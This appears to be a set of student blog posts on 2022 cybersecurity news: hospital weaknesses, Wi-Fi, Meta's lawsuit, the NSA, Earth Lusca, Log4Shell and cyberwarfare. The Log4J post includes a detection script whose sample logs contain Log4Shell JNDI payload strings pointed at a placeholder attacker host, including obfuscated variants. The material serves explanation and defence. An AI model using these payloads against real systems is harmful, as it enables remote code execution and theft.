Most Hospitals Have Outdated Cybersecurity Software, Making Them An Easy Target

Introduction

It has recently been reported that over half of medical devices have critical security vulnerabilities (Cynerio, Jan 19, 2022). Healthcare organizations are an easy target for cyberattacks because of their weak defenses, and something must be done about it for the safety of the public.

Why is this a big issue?

Hackers are becoming increasingly successful in breaching healthcare organizations’ data, and this problem has been running rampant for the past few years. These data breaches have huge consequences for everyone.

For example, Maryland’s Department of Health was hit with a devastating ransomware attack, which gave hospitals a difficult time, especially given the higher hospitalization rates caused by COVID-19. One major consequence of this breach was that the department could not release its case numbers for several weeks, hindering its ability to take well-informed action in response to COVID-19 and to notify other states of its case numbers (ZDNet, Jan 12, 2022).

Recent research reveals that ransomware attacks are posing serious threats to healthcare consumers, including increased mortality rates and complications in treatment that often increase recovery time or yield incomplete recoveries.

Some examples of hospital equipment that are especially vulnerable to attacks are:

  • IV pumps, 73% of which have a serious vulnerability that can threaten patient safety, leak confidential data, or limit the availability of the pump itself if it is targeted in an attack (Cynerio, Jan 19, 2022).
  • Any devices running Windows versions older than Windows 10, which make up the majority of the devices in many healthcare departments. This presents a potential danger to patients connected to any of these devices (Cynerio, Jan 19, 2022).

How is this issue being addressed, and what are the challenges in doing so?

According to an article by Cynerio (January 19, 2022), network segmentation is sufficient to prevent over 90% of the security dangers associated with medical devices in hospitals and is the most effective method of doing so. However, the article does not discuss the logistics of such an implementation in terms of time or money.

Another strategy for improving the security of data in hospitals is to keep software up to date. The old software still in use in many healthcare organizations has a significant variety of shortcomings when it comes to protecting against cyberattacks. Organizations could improve on this by updating to more recent and higher-quality software. This proves to be a strikingly difficult challenge, however, since investing in an area like this does not produce revenue for the organization.

Further, any attempt by healthcare organizations to predict the cost-effectiveness of upgrading software appears to be fruitless, as technology has evolved far too rapidly for there to be any significant historical evidence to inform such a decision.

Yet another struggle for hospitals is the lack of individuals with cybersecurity expertise working in healthcare. For example, only 21% of hospitals had a dedicated security executive in 2019, and only 6% were identified as having a Chief Information Security Officer. There is a significant rush for hospitals to hire cybersecurity professionals, which is creating such high demand that cybersecurity companies are providing hospitals with a growing array of services (Black Book Research, Nov 4, 2019).

Because of this lack of expertise, healthcare organizations remain unaware of which solutions exist, let alone which ones are best suited to them. A further result is that hospitals are unable to perform due diligence in testing their cybersecurity systems, so they end up dealing with attacks reactively rather than proactively.

What does the future of cybersecurity in healthcare look like?

Over the past few years, healthcare organizations have become increasingly aware of the dangers associated with cyberattacks, so it is becoming increasingly common for them to set concrete goals in terms of cybersecurity (Black Book Research, Nov 4, 2019). This will allow them to attain measurable results and assess their ability to protect themselves against cyberattacks. The vast majority of healthcare organizations predict a foreseeable increase in cyberattacks against them in the future, thus giving them a good reason to improve upon their existing systems. Alas, we can only hope that in the future, healthcare organizations will choose to pay more attention to the security of their data so they are better enabled to save more lives.

Key Takeaways

Healthcare organizations have been a very common target for cyberattacks in recent years, and this danger’s presence is only projected to increase in the coming years. This happens for a multitude of reasons, most of which lie in the inability of healthcare organizations to address such issues and a lack of experience with attacks of this nature in the ever-evolving digital landscape. Hopefully, they will be able to find effective security solutions in the coming years as the attacks inevitably continue.

References

Unsecured Public Wi-Fi Networks

Public Wi-Fi networks are becoming more and more abundant. Recent reports show that there are over 410,000 public Wi-Fi networks in the United States[1]. While this is a good thing for the general public, it is also a good thing for malicious hackers. There is no guarantee that the Wi-Fi hotspot you are using is secure, and this creates a gold mine for hackers who want to take advantage of it.

Some of the many risks associated with public hotspots:

  • Not paying attention – Some people simply assume that the hotspot they are connected to is secure, and this makes them more susceptible to malicious hackers[2].
  • Lack of encryption – Countless Wi-Fi hotspots lack sufficient encryption and in some cases have no encryption at all. This makes the hotspots very susceptible to hackers breaking in and stealing people’s information[2].
  • Lack of password protection – A lot of public hotspots lack secure passwords, and some have no password at all. This makes it effortless for hackers to gain access to the network and get at your data[2].

Unsecured Wi-Fi hotspots[3]

My personal experience with public Wi-Fi networks

I have never had my data leaked while using a public hotspot, knock on wood, but that is because I have always taken extra precautions when using these networks. For one, I have never and will never use online banking on a public hotspot. That would be like inviting a hacker to access my bank account. Since you can never know for sure that a public hotspot is secure, it is my opinion that it is unwise to access any sensitive or private data on these networks. Things like Instagram, Facebook, and the like are all fine, but something like bank statements or government records would not be a good idea.

How the government is keeping public hotspots secure

Governments around the world have begun to impose rules for these networks to keep them secure[1]. One of these rules is what I will be focusing on, and that is DNS filtering.

DNS filtering

DNS filtering is a great way to protect users on public hotspots. It acts as a barrier, or second layer of protection, against hackers by preventing threats from ever reaching your device: DNS filtering blocks connections to shady or insecure websites that might try to steal your data. Another feature is that the business, or whoever owns and controls the public hotspot, can choose which websites to block. For example, they can block pornographic websites, websites that involve violence, etc., to create a safer environment.

VPN

Another way to make these public networks secure would be to use a VPN, although in my opinion this is not very practical. Only the user who has the VPN is protected, not the whole network, so multiple VPNs would be required. With the sheer number of public hotspots, and the many more users who access them, having that many VPNs is not feasible on a large scale. A VPN works by creating a private, secure connection with the network, which encrypts whatever data you access. That said, this is a good option if you want extra protection for yourself, but you have to take into account that most VPN services come with a monthly fee.

Final thoughts

Public Wi-Fi networks have come a long way in the past 10 years, but they now must focus on the issue of security. Public Wi-Fi networks are not always secure, so it is better to play it safe than to get “pwned”. I will continue to exercise caution when I access these public networks and I strongly advise you to do the same.

Sources:

  1. https://thehackernews.com/2022/01/dont-use-public-wi-fi-without-dns.html 
  2. https://www.perimeter81.com/blog/wi-fi/public-wi-fi-risks-protect-your-clients 
  3. https://blog.vpncity.com/how-to-stay-safe-on-public-wifi-with-vpn/ 

Can we really avoid it?

Reports say that Team USA athletes heading to Beijing for the Olympic Games have been advised to leave their personal phones behind, to avoid being tracked during or after the Games, and are being encouraged to use burner phones while they are there.

This really makes me wonder. With how far we have come using smart mobile devices, smart security systems for our homes, etc., if corporations or the government decide that they want to track us, is there really a way to avoid it? Do we go back to using archaic means of communication? Do we stop using the technology that has been developed?

Measures like the ones advised to Team USA will cause discomfort; it might not be a lot, but the discomfort is there. Although they tried to find a solution by advising the athletes to use burner phones instead, it makes it difficult for them to talk to their families, who will not be allowed to travel with them to Beijing due to COVID-19 protocol. It also does not allow them to post to social media, which could be important for them: they will want to show the world that they won a medal as soon as possible, but cannot, and have to wait until the end of the Olympics when they go back home.

With all the technological developments that have been made and how they work, the only solution for protecting our privacy will be similar to what the athletes have been advised to do: using older forms of technology. For some people, using older forms of technology will not be a big deal, but for the many people who depend heavily on technology, it will affect a lot of how they go about their lives.

Smart Security

Lots of people use smart security in their homes. They have cameras at their front doors and inside their homes, locks that are connected by networks, and much more. These cameras are connected to networks, and these networks can be tapped. Changing security systems and going back to using keys and locks may not prove difficult, but it does incur a cost for the owner.

Televisions and Entertainment

Lots of speakers and TVs now have built-in microphones that listen for you to give them instructions. These are usually connected to the internet as well and are possibly always listening unless they are unplugged. Using older TVs and other forms of entertainment should not be a big deal, but it depends on the person we are talking about and how much that person depended on these systems.

Smartphones

Our phones are devices we carry everywhere and on which we probably keep a lot of our information. They are probably an extremely efficient way of watching people: you can basically monitor their every move. Using burner phones the way the USA athletes have been advised to do would actually change the way of life for a lot of people, because I believe that a lot of the world’s population depends heavily on their smartphones.

References

  1. https://www.cnet.com/news/team-usa-reportedly-tells-athletes-not-to-take-their-phones-to-winter-olympics/
  2. https://www.eff.org/issues/privacy

Facebook Lawsuit: Market Dominance at the Cost of a User’s Privacy

“Privacy is dead, and social media holds the smoking gun.”

– Pete Cashmore, CEO of Mashable [4]

Social media platform Facebook has been involved in controversy after controversy throughout its lifetime, which has many people questioning the ethics of the practices Facebook continues to engage in today. I think that the quote above is an important realization about Facebook and other platforms that daily users are not paying enough attention to. Exploitation of millions of users’ personal data for market dominance worldwide is a very significant issue that should not be taken lightly by anyone, as privacy is a right that a human being should have at all times.

Photo by James Bareham, found on The Verge [5]

The Lawsuit

On January 14, 2022, Meta [6] was sued in the UK for £2.3 billion (roughly $3.92 billion CAD) in a class action lawsuit. According to the lawsuit, Facebook has set an unfair expectation upon its users by handing over users’ personal data without giving them adequate compensation for taking said data [1]. Covering the period from October 1, 2015 to December 31, 2019, legal experts have claimed that more than 44 million users’ personal data has been exploited for Facebook’s own gain [2]. Legal experts also state that, since Facebook is abusing its power unfairly, Facebook could have to pay £50 (roughly $85.1 CAD) to every UK user [3].

There has never been a claim like this against Facebook in the UK, as it is the dominant social media platform for people to communicate and connect with family, friends and coworkers. This gives Facebook market dominance over users’ data, which has caused some UK users to realize the dark side of Facebook’s policies. Following this, a Meta spokesperson commented on the matter in the following quote.

“People access our service for free. They choose our services because we deliver value for them and they have meaningful control of what information they share on Meta’s platforms and who with. We have invested heavily to create tools that allow them to do so.”

– Meta spokesperson [1]

Photo by James Melaugh, found on The Guardian [7]

My Personal Thoughts

I have never been the biggest user of social media in the first place, but I used to have a Facebook account where I would communicate mainly with family. After some time, though, I discovered some of the information that Facebook had on me, which shocked me, to say the least. I think this lawsuit should help raise even more awareness about privacy among the UK users who use Facebook daily; they should question whether they want to continue using Facebook going forward.

I also think that this affects social media platforms such as Instagram and WhatsApp, which are owned by Facebook, so hopefully more people become aware of what happens as they continue to be users. Most people typically would not read through the entire terms and conditions when creating an account, but if people were more aware of the amount of data Facebook is obtaining, their privacy could be saved.

References:

  1. Milmo, D. (2022, January 14). Meta sued for £2.3bn over claim Facebook users in UK were exploited. The Guardian. Retrieved January 19, 2022, from https://www.theguardian.com/technology/2022/jan/14/meta-sued-for-23bn-over-claim-facebook-users-in-uk-were-exploited
  2. PYMNTS.com. (2022, January 17). UK lawsuit claims Facebook Exploited user data. PYMNTS.com. Retrieved January 19, 2022, from https://www.pymnts.com/legal/2022/uk-lawsuit-claims-facebook-exploited-personal-data-of-44-million-users/
  3. Landi, M. (2022, January 15). Every UK Facebook user could get £50 as lawsuit filed against social media giant. Mirror. Retrieved January 19, 2022, from https://www.mirror.co.uk/news/uk-news/every-uk-facebook-user-could-25954863
  4. Dispatch. (2019, May 15). Holding the smoking gun. The NYU Dispatch. Retrieved January 19, 2022, from https://wp.nyu.edu/dispatch/2019/05/15/holding-the-smoking-gun/#:~:text=As%20Mashable%20CEO%2C%20Pete%20Cashmore,media%20hold%20the%20smoking%20gun.%E2%80%9D&text=As%20startup%20entrepreneur%20David%20Alston,looking%20for%20the%20best%20deals.
  5. Newton, C. (2020, July 30). Facebook usage and revenue continue to grow as the pandemic rages on. The Verge. Retrieved January 19, 2022, from https://www.theverge.com/2020/7/30/21348308/facebook-earnings-q2-2020-pandemic-revenue-usage-growth
  6. The Facebook Company is now Meta. Meta. (2021, November 23). Retrieved January 19, 2022, from https://about.fb.com/news/2021/10/facebook-company-is-now-meta/
  7. Hern, A. (2020, February 16). Internet privacy: The apps that protect you from your apps. The Guardian. Retrieved January 19, 2022, from https://www.theguardian.com/technology/2020/feb/16/internet-privacy-settings-apps-to-protect-you-

Biden to Expand National Security Agency Role in Government Cybersecurity (January 20th, 2022)

On Wednesday, January 19th, President Biden expanded the responsibilities and scope of the NSA (National Security Agency) in protecting the US government’s computer networks.

National Security Agency headquarters in Fort Meade, Md. The NSA has sought to expand its cybersecurity mission. (Photo: Sait Serkan Gurbuz/Reuters)

For those unfamiliar with the NSA, it is a national security agency within the U.S. Department of Defense that is responsible for monitoring and processing information on global threats, for the collection and handling of domestic and foreign intelligence through interception, encryption and decryption, and in turn for the protection of U.S. information systems and communication networks.

With this memorandum signed by President Biden, the NSA can now require all operators of national security systems, such as the FBI, CIA, US Department of Defense and other US intelligence agencies, to implement baseline cybersecurity practices. Such practices include two-factor authentication and standard use of encryption. Effectively, all US national security agencies now have to be aligned on basic cybersecurity standards.

In addition, all cyber incidents involving any U.S. agency that deals with “security” will now have to be reported to the NSA, which will further aid the U.S. government in identifying and mitigating cybersecurity threats across all national security systems in all of its branches. This will in turn require all US defence and intelligence agencies to secure any tools they use to share data with one another, whether that data is classified or not.

Historically, the U.S. government has been plagued by cyberattacks from foreign powers such as China and Russia, and tensions have only grown over the years. With this new mandate, the NSA is now effectively responsible for ensuring that all US agencies dealing with national defence are held to an acceptable standard.

The U.S. has multiple areas of expertise where it may hold a technological advantage over other nations; one example is military technology. However, with multiple cybersecurity breaches by China and Russia over the years, it has been repeatedly shown that the U.S. is vulnerable to cyberattacks by foreign actors. One example was the theft of data related to the F-35 program, which China used to develop its own indigenous stealth fighters, the J-20 and J-31.

Given current political tensions, the U.S. now seeks to strengthen its cybersecurity practices, especially by setting a baseline minimum for all departments dealing with sensitive information to follow, and is effectively granting the NSA more responsibility and power by holding it accountable for making sure that all agencies follow the same cybersecurity practices. From a national defence perspective, this memorandum makes sense, as it looks to align basic cybersecurity practices among all US security departments. However, it also looks like the NSA gains even more power and legal oversight over how it can collect information by having all security departments report to it. My question to everyone is: should this be something of concern to everyday citizens? Or does national security take precedence, justifying greater power for the NSA, a U.S. department notorious for spying on its citizens?

Sources:

https://www.wsj.com/articles/biden-to-expand-national-security-agency-role-in-government-cybersecurity-11642604412?mod=lead_feature_below_a_pos1

https://www.nsa.gov/about/mission/index.shtml

https://www.19fortyfive.com/2021/07/how-china-stole-the-designs-for-the-f-35-stealth-fighter/

Global high-value government organizations and private institutions targeted by Chinese hackers “Earth Lusca”

Who is “Earth Lusca” and what is their motivation?

Earth Lusca is a China-based cyber-espionage group that has been very active in recent years. Its main motivation is spying and gathering intelligence from government and private institutions worldwide. It has been rumored that the group spies on other governments and institutions for the benefit of the Chinese government, but these rumors remain unconfirmed, as the group has also been associated with purely financially motivated attacks against Chinese companies.

Looking at some of the attacks that were carried out, the rumors of working with the Chinese government make sense. The institutions and organizations the group has attacked include¹:

  • Government institutions in Taiwan, Thailand, Philippines, Vietnam, United Arab Emirates, Mongolia, and Nigeria
  • Educational institutions in Taiwan, Hong Kong, Japan, and France
  • News media in Taiwan, Hong Kong, Australia, Germany, and France
  • Pro-democracy and human rights political organizations and movements in Hong Kong
  • Covid-19 research organizations in the United States
  • Telecom companies in Nepal
  • Religious movements that are banned in Mainland China

I think it’s rather worrying that this group continues to carry out these attacks worldwide with no apparent consequences. This has been going on for the past few years!

I also think it’s quite interesting to note that in the recent past it has almost become a trend for government espionage groups to take part in financially motivated attacks. Some examples include² Rocket Kitten (Iran), Lazarus Group (North Korea), and UGNazi.

How are the attacks being operated?

(Diagram of Earth Lusca’s two operational pathways, taken from Trend Micro’s technical brief³)

As can be seen in the diagram above, the group operates along two pathways. The bottom pathway relies on virtual private servers (VPS) that push watering-hole and spear-phishing operations out to victims’ computers. Once victims’ computers are compromised by malware, this pathway is also used as a command-and-control server (C&C callback) to gain complete control of the victims’ computers.

The top pathway in the diagram also acts as a C&C server. It serves the additional function of searching a victim’s network for loopholes and vulnerabilities and building tunnels within it (EarthWorm tunneling).

On the technical side, some of the malware families Earth Lusca uses include⁴:

  • Doraemon backdoor
  • FunnySwitch backdoor
  • ShadowPad backdoor
  • Winnti malware
  • AntSword web shell
  • Behinder web shell

How can the attacks be minimized or even stopped?

Funnily enough, researchers suggest that simply avoiding clicking on links in emails/websites from unknown sources and updating applications regularly can significantly minimize these attacks or even completely stop them. I think it’s crazy (and funny) to think that governments and high-value organizations, who constantly advise the public about the importance of cyber security, are getting attacked and hacked this easily. Advanced cyber security tools such as “Trend Micro XDR” can also be used by big organizations to provide maximum protection against such groups. According to Trend Micro’s technical analysis of Earth Lusca, these tools work by “collecting and correlating activity data across multiple vectors — from emails and endpoints to servers, cloud workloads, and networks — enabling a layer of security detection and investigation that cannot be matched by traditional security solutions.”⁵

On a final note, I would like to share my opinion on organizations and how they handle and talk about cyber security. I think that most companies and governments in recent years have raised awareness among the general public about the importance of cyber security and have started applying advanced and modern tools of cyber protection. However, I think the topic is still not taken seriously by many, and some companies are also not very transparent about the whole process. Cybersecurity failure is one of the main risks facing the entire world in the short and medium term and should be treated according to its magnitude (The Global Risks Report).

References: 

  1. https://therecord.media/earth-lusca-threat-actor-targets-governments-and-cryptocurrency-companies-alike/ (list of institutions)
  2. https://en.wikipedia.org/wiki/List_of_hacker_groups (hacker groups)
  3. https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf (pathways image, Trend Micro’s Analysis of Earth Lusca’s Operations, Page 2 Figure 2)
  4. https://www.bankinfosecurity.com/new-chinese-threat-group-conducts-espionage-theft-a-18336 (list of malwares)
  5. https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf (page 28: conclusion)
  6. https://www.trendmicro.com/en_id/research/22/a/earth-lusca-sophisticated-infrastructure-varied-tools-and-techni.html
  7. https://www3.weforum.org/docs/WEF_The_Global_Risks_Report_2021.pdf (the global risks report)

Log4J: An Exploit that has Global Ramifications

What is Log4J?

Log4J (Apache Log4j) is a Java library for logging. Logging is the recording of an application’s activity; it is very useful for determining what your application is doing and for understanding it better. The most common use case is recording errors caught in a try/catch clause or another exception-handling mechanism. Log4J is extremely popular, with close to 30 million downloads in the last 4 months alone[5]. Over 7000 open-source projects have Log4J as a dependency.

What is the vulnerability?

When using Log4J (or any logger), the intended error information or other logged data is sent to the program’s servers, databases, etc. whenever an error occurs. Attackers intentionally caused errors, but instead of just sending the logged data they also sent a malicious payload that resulted in a code injection, and in turn in remote code execution. An example of such execution could be “read file ‘/naveed/supersecretpasswords’, upload https://getpwned.ru”, where my passwords file would be uploaded to the internet. The range of the remote code execution is unlimited.

Intended usage of JNDI and an LDAP server — Sysdig[6]

The most common form of the exploit has used the JNDI interface, which looks up objects, detects changes, and binds remote objects. Hackers were able to use their own LDAP server to send the malicious payload through the JNDI interface.

Attackers’ use of the JNDI interface to send a malicious payload — Sysdig[6]

The malicious payload is then executed within the application and the exploit begins. There have been commonalities in the types of attacks delivered through the payload. These include RAT infestations (Meterpreter, Bladabindi, and HabitsRAT), DDoS attacks (Webtoos malware), obfuscated HTTP requests, coin-miners, Cobalt Strike, and many more[2]!
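The trigger for the whole chain described above is a `${jndi:...}` lookup string landing in a logged field. As an added, defender-side example (not from the original post or the Log4j project), the Python below scans constructed sample log lines for such lookups. Because Log4j expands nested lookups before the `jndi:` prefix becomes visible, the scanner first collapses `${lower:…}`, `${upper:…}` and `${name:-default}` forms, which a naive substring search would miss; hostnames, IPs and log lines are all constructed.

```python
import re
from typing import Dict, List, Optional

# Constructed sample application log lines (not real traffic).
# The ".example" domain is reserved and used here as a placeholder.
SAMPLE_LOG_LINES = [
    '2021-12-11 10:02:13 INFO  Login failed for user "alice" from 10.0.0.7',
    '2021-12-11 10:02:14 WARN  User-Agent: ${jndi:ldap://attacker.example/a}',
    # Nested lookups: Log4j resolves ${lower:j} to "j" before seeing "jndi:".
    '2021-12-11 10:02:15 WARN  User-Agent: ${${lower:j}ndi:${lower:l}dap://attacker.example/b}',
    # Default-value syntax ${name:-default}: an empty lookup falls back to the default.
    '2021-12-11 10:02:16 WARN  X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}',
    # Benign template text: a lookup that is not JNDI must not be flagged.
    '2021-12-11 10:02:17 INFO  Price updated to ${price} for SKU 1234',
]

# Innermost ${...} lookup: a body with no nested "${" and no "}" inside it.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# After normalization: a JNDI lookup and the URI scheme it points at (ldap, rmi, ...).
_JNDI = re.compile(r"\$\{\s*jndi:\s*([a-z][a-z0-9+.-]*):", re.IGNORECASE)


def _resolve_one(match) -> str:
    """Expand one innermost lookup the way Log4j's lookup syntax would."""
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${name:-default}: the lookup for "name" fails, so the default is substituted.
        return body.split(":-", 1)[1]
    # Any other lookup (jndi:, price, ...) is left as-is for the detector to inspect.
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly expand innermost lookups until nothing changes (or a round cap is hit)."""
    for _ in range(max_rounds):
        new_text = _INNERMOST.sub(_resolve_one, text)
        if new_text == text:
            break
        text = new_text
    return text


def find_jndi_lookup(line: str) -> Optional[Dict[str, str]]:
    """Return the URI scheme and normalized line if a JNDI lookup is present, else None."""
    normalized = normalize_lookups(line)
    m = _JNDI.search(normalized)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "normalized": normalized}


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan log lines and report each one carrying a JNDI lookup, with its 1-based line number."""
    findings: List[Dict[str, object]] = []
    for idx, line in enumerate(lines, start=1):
        hit = find_jndi_lookup(line)
        if hit is not None:
            findings.append({"line_no": idx, **hit})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG_LINES):
        print(f"line {f['line_no']}: jndi lookup via {f['scheme']} -> {f['normalized']}")
```

Running the block reports lines 2, 3 and 4 (schemes ldap, ldap, rmi) and leaves the benign `${price}` line alone; the same normalization step is what lets a detector keep up when the literal `jndi:` string is split across nested lookups.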

Who has been affected and how widespread is the Vulnerability?

Since the vulnerability’s public disclosure on December 10th, 2021, over 44% of corporate networks have been attacked. Cloudflare’s CEO tweeted in early December that they had seen over 400 exploit attempts per second (you are reading that right, per second) on its network. The most devastating exploits send malware through the returned data. Large corporations and institutions have been attacked, such as Microsoft and university servers, with the aim of gaining industry secrets. Several countries are involved as well: Chinese and Iranian hacker groups have been identified as contributing to attacks and to further development of the Log4J exploit. The effects of the exploit do not end after packages have been fixed and the exploit patched. Hackers have been using the exploit to further increase the vulnerability of applications and servers by inserting their own exploits to use at another time.

Has the Log4J exploit been fixed?

In short, no, the exploit has not been fixed. Of the 500 identified packages dependent on Log4J, 187 have fixed the exploit and 314 currently have not. While there have been several patches and remedies, there has not been a significant update to the Maven Central repository. The vulnerability is several layers deep for over 80% of the packages used. This requires a complete rework of the inner workings of the packages, as most of them are over five levels deep in their Log4J dependency[3]. Since December, a massive effort by open-source contributors has resulted in over 13% of them being fixed, and the effort continues[3]. Microsoft has stated that the Log4J exploit will last several years, a sentiment shared by several experts in the field.

Code Examples of Exploit Implementation:

Questions for Students

  1. Have you used a Logger package before?
  2. Have you been affected in any way? (New Patches you have had to install, Minecraft Servers down, etc)

References

(1) https://logging.apache.org/log4j/2.x/security.html
(2) https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/
(3) https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html
(4) https://cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability
(5) https://blog.sonatype.com/why-did-log4shell-set-the-internet-on-fire#:~:text=log4j%2Dcore%20is%20the%20top,total%20population%20of%207.1%20million.
(6) https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/
(7) https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-44228/

Minimizing the Damage of Large-Scale Cyberattacks (Jan 20, 2022)

On Friday, January 15th, 2022, the EU initiated a six-week stress test of its member states’ cybersecurity. According to Bloomberg.com, the purpose of these tests is to strengthen the EU’s preparedness for incoming attacks, as well as to increase cooperation and coordination among member states. In the first simulation, a cybersecurity incident is discovered at a fictitious major Finnish power company. Because this power company’s systems are interconnected with other Finnish national and international systems, the simulation required intensive cooperation between EU member states. The response force was responsible for determining the origin of the crisis, determining its potential impact, and doing everything possible to limit the scope of the issue. This is the largest stress test of its kind; the EU will likely use it to develop a framework for a joint response to future major incidents (infosecurity-magazine).

Cyberattacks are on the rise

The global pandemic has created an environment in which cyberattacks flourish. During the first year of the pandemic, cyberattacks doubled in Europe (cnn) and attacks on Canadian hospitals alone increased by 250% (yahoo finance). This included one of Canada’s worst cyberattacks in history, which caused extreme disruption to the health care system in Newfoundland and Labrador (cbc). This attack, like many other attacks on hospitals, was a ransomware attack, in which malicious actors take health data hostage by encrypting it and only release the decryption key if a ransom is paid. These attacks have cost Canada millions of dollars; the Communications Security Establishment (CSE) estimates that the average cost of a data breach is $6.35 million (globe and mail). The attacks have also caused massive disruption in health care facilities during the pandemic (cbc).

Attacks on Canadian healthcare facilities saw a massive spike during the pandemic (yahoo finance).

Canada’s preparedness strategy

            Canada has outlined its National Cyber Security Strategy on its website, which includes a multifaceted approach to prevention and preparedness. However, this does not mean that Canadians are necessarily well protected. According to the Financial Post, more than half of Canadian businesses rarely or never conduct penetration tests. The Canadian government does stress-test critical components (driving.ca); however, the scope of these tests is not public knowledge as far as I am aware. Additionally, I could not find any public information on international strategies that Canada has developed with other nations to handle major cyberattacks.

Should Canada follow the EU’s steps in joint preparedness?

            As cyberattacks become more and more prevalent, I believe that creating frameworks to handle major cyberattacks will become necessary. The EU is taking an important step in determining the best ways not only to prevent these attacks, but also to mitigate the damage when they do occur. I believe that these frameworks need to be international, but also interprovincial for Canada. With how linked all of our government systems are, a single entry point could cause massive damage, as we saw in the Newfoundland and Labrador hospital attack. While prevention is clearly the most efficient option, being prepared to mitigate the damage is also extremely important.

References

https://www.bloomberg.com/news/articles/2022-01-15/eu-targets-fictitious-finnish-power-company-in-cyberattack-test

https://www.infosecurity-magazine.com/news/eu-supply-chain-attack-simulation/

https://www.cnn.com/2021/06/10/tech/europe-cyberattacks-ransomware-cmd-intl/index.html

https://ca.finance.yahoo.com/news/healthcare-sector-sees-250-spike-in-cyberattacks-134754354.html?guccounter=1&guce_referrer=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&guce_referrer_sig=AQAAABpd9jCTH7RpuFymznurUtfu2DFRQiBUuB1hbsKzYXJRsFxhKoAz36t0ahkbbjdj78KDDA7lY_apNb-pz02Nx4klyKhdE5r8H2cjbd-AosP09Ze0cVL66HagG45m1Jck7qia11_VlVHV7BMoZ62OePklnnbfkdX7tfCdkevXrtDR

https://www.theglobeandmail.com/business/adv/article-protecting-yourself-in-the-new-era-of-cybercrime/

https://www.cbc.ca/news/canada/newfoundland-labrador/nl-cyber-attack-worst-canada-1.6236210

https://www.publicsafety.gc.ca/cnt/rsrcs/pblctns/ntnl-cbr-scrt-strtg/index-en.aspx

https://financialpost.com/pmn/press-releases-pmn/business-wire-news-releases-pmn/more-than-half-of-canadian-businesses-rarely-or-never-conduct-regular-penetration-testing

https://driving.ca/car-culture/auto-tech/can-canada-fend-off-a-colonial-pipeline-like-cyberattack

The Faces of Cyberwarfare – From Russia to China (January 19, 2022)

Warfare has been a common theme throughout human history; however, in the 21st century, it has shifted from outright hostility and aggression to a more discreet form conducted via the internet. This article will explore how cyberwar is conducted to achieve a state's objectives, and its rippling consequences for the victims.

The War On All Fronts

On January 14, Ukraine experienced a string of cyberattacks that took down several Ukrainian government websites and replaced them with a warning message stating, “All information about you has become public, be afraid and expect the worst” (Brennan et al., 2022). Sources suggest that the attack was initiated by an unknown group with close ties to the Russian government (Brennan et al., 2022). The story highlights the uncanny ability of a foreign entity (Russia) to attack the government of another country (Ukraine) directly while maintaining deniability. Not only were the attackers able to extract private information, but they were able to intimidate high-ranking officials without explicit aggression. Cyber warfare has similarly become a tool for Russia to exert its authority and presence in other countries (especially post-Soviet states), in a way that would make even Stalin proud. For instance, Sood and Chaturvedi recently analyzed a piece of malware called ‘Collector-stealer’ whose purpose is to “target European countries, but it also affects users in other countries such as the USA, China, Cambodia and others” (Sood and Chaturvedi, 2021). The malware was found to be of Russian origin and is delivered to users through phishing and shady downloads (see figure 1). It could have devastating effects, particularly when used against government institutions, as it extracts private information by copying text, capturing window screenshots, and streaming the victim's computer remotely (Sood and Chaturvedi, 2021). Together, these two examples reiterate the theme of cyber warfare, which is to indirectly achieve one's goal of harming foreign governments and their citizens without direct aggression.

The Big Influence 

Furthermore, cyber warfare can be used to influence a government through hidden cyber channels or to spread propaganda. The nation-state that has perfected the influence game is China, whose Communist Party has been known to influence elections, laws, and even politicians (no surprise here!) in Western countries (Fife and Chase, 2022). Recently, the Canadian Security Intelligence Service (CSIS) issued a statement describing China's attempts to “covertly domesticate relations with elected officers to achieve sway over parliamentary debates and authorities decision-making” (Fife and Chase, 2022). The article emphasizes the use of disinformation campaigns on social media to influence public order and policy in a foreign country. For instance, a Washington Post report describes how Chinese institutions (police departments, for instance) purchased Twitter and Facebook accounts (Cadell, 2022). These accounts then promoted positive views of the country's leadership, spread misinformation about political candidates and ideologies, thereby furthering domestic polarization (see figure 2), and buried sensitive topics such as the Uyghur genocide (Cadell, 2022). Combined, these tools can have devastating effects on a nation and could undermine democracy or social unity through covert influence.

What Can Be Done 

  1. Increased funding for cybersecurity agencies (private and government)
  2. Pressure Big Tech to increase monitoring on their services
  3. Develop new tools to counter foreign cyberattacks and stronger encryption

These strategies could be used to limit foreign interference and protect citizens and institutions from cyberattacks.

Finally, this article has highlighted how cyberwar is conducted to achieve military goals without physical aggression, or to influence a foreign government into promoting policies and laws that are not in the interest of its citizens. Also, considering that Russia (the successor to the Soviet Union) and China (still ruled by a Communist Party) both engage extensively in cyber warfare, it makes one wonder whether Karl Marx should have included a chapter on cyberwarfare in his bestseller, the Communist Manifesto!

Appendix

Figure 1: The image above was extracted from the Sood and Chaturvedi article (Sood and Chaturvedi, 2021). It shows a keygen advertised as capable of cracking Microsoft Office. Upon downloading and running it, the Collector-stealer malware is activated, transmitting the user's private data back to the attacker.

Figure 2: The image above shows a fake Twitter account with a post about deaths related to gun violence in the United States. The account is currently suspended for disinformation. Nonetheless, numerous accounts like these spread false information to further polarization in Western countries. Image extracted from a BBC article (Carmichael, 2021).

References

